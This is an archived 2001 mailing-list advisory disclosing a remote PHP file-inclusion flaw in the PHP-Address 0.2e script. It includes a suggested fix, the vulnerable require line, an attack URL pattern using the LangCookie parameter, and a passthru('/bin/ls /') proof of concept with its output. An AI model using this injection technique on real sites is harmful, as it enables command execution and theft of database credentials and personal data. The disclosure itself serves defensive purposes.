Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
From: tim vandermeersch (tim.vandermeerschpandora.be)
Date: Tue Dec 25 2001 - 22:19:11 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    PHP source injection in PHPAddress


    PHP-Address is a collection of PHP3-Scripts (works on PHP4 too)
    for maintaing a small web-based address-database. It can be found
    at http://phpaddress.huebsch-gemacht.de/


    Change the global.php3 file so it looks like this:
    # (c) Copyright in 2000, 2001 by Chris Huebsch
    $LanCookie = ""; // THIS LINE
    if ($LangCookie)
      require("$LangCookie.php3"); // Line 5

    Tested version

    PHP Address 0.2e (09.12.2001)

    The Problem

    Any user who requests an url like
    "http://SERVER/globals.php3?LangCookie=INCLUDE_FILE" is
    able to include any file he wants.


    I putted a PHP script on my server wich I wanted to include:

        passthru("/bin/ls /");

    then i requested this url:
    (the .php3 is allready there look at line 5 in global.php3)

    bin boot dev etc home initrd lib lost+found mnt opt proc root sbin swap tmp
    usr var

    Note that any PHP code could be included, malicious users could get access
    to database
    passwords, personal information, ...

    Tim Vandermeersch